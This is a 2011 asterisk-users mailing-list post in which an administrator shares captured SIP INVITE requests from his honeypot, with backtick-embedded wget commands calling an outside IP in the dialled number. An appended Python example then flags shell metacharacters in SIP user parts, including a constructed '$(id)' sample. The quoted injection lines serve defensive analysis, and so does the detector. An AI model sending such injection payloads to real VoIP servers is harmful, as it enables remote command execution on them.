[asterisk-users] new sort of shell attack attempt via SIP?

Tom Browning ttbrowning at gmail.com
Sun Sep 11 18:05:20 CDT 2011


I haven't seen this sort of URI/shell attack prior to today but it
looks interesting.  Embedding a backtick in the URI with a wget that
doesn't seem to do much to an empty file.

I'm guessing it is just a probe to see if they can send further
embedded backtick shell commands to my Asterisk instance (by watching
their weblogs @ 91.223.89.94)

(This happens to be my "honeypot" that just accepts all calls and
dumps them into one big Asterisk 10 beta ConfBridge :-)


INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.
INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.
INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.
INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.
INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.
INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.


Does Asterisk have a shell injection weakness?  Or perhaps this targets
some other Asterisk config manager that is subject to injection via
URI?

Tom
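As an added example (not from Tom's post and not Asterisk code), here is a small Python check that pulls the user part out of SIP request lines like the ones quoted above and flags shell metacharacters that a dialled number should never contain. The sample lines are constructed to mirror the post, and the list of markers is my own choice.

```python
import re

# Constructed sample modelled on the INVITE lines quoted in the post. The
# backslash-x20 is the literal escape shown by the capture tool, not a space;
# the trailing "." stands for the CRLF that ends a SIP request line.
SAMPLE_LINES = [
    "INVITE sip:00123456789000`wget\\x20-O\\x20/dev/null\\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.",
    "INVITE sip:0115551234@x.x.x.x SIP/2.0.",       # ordinary dialled number
    "REGISTER sip:x.x.x.x SIP/2.0.",                # no user part at all
    "INVITE sip:1000$(id)@x.x.x.x SIP/2.0.",        # $(...) substitution variant (constructed)
]

# Request-Line: Method SP Request-URI SP SIP-Version; user part is optional.
REQUEST_LINE = re.compile(
    r"^(?P<method>[A-Z]+)\s+sips?:(?:(?P<user>[^@\s]+)@)?(?P<host>[^\s;>]+)\s+SIP/2\.0"
)

# Characters a dialled extension never needs but a shell interprets.
SHELL_MARKERS = {
    "backtick": "`",
    "dollar-paren": "$(",
    "semicolon": ";",
    "pipe": "|",
    "ampersand": "&",
    "encoded-space": "\\x20",
    "url-encoded-space": "%20",
}

def shell_markers_in(user):
    """Return the names of shell metacharacters present in a Request-URI user part."""
    return [name for name, token in SHELL_MARKERS.items() if token in user]

def suspicious_request_lines(lines):
    """Parse SIP request lines and report those whose user part carries shell syntax."""
    findings = []
    for line in lines:
        m = REQUEST_LINE.match(line)
        if not m or not m.group("user"):
            continue
        reasons = shell_markers_in(m.group("user"))
        if reasons:
            findings.append({"method": m.group("method"), "user": m.group("user"), "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in suspicious_request_lines(SAMPLE_LINES):
        print(f"{f['method']} user={f['user']!r} markers={','.join(f['reasons'])}")
```

The same idea, inverted into a whitelist (digits, `+`, `*`, `#` only), belongs wherever a dialplan hands ${EXTEN} to System() or to an external script, since that is the point at which a backtick in the user part would otherwise reach a shell.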


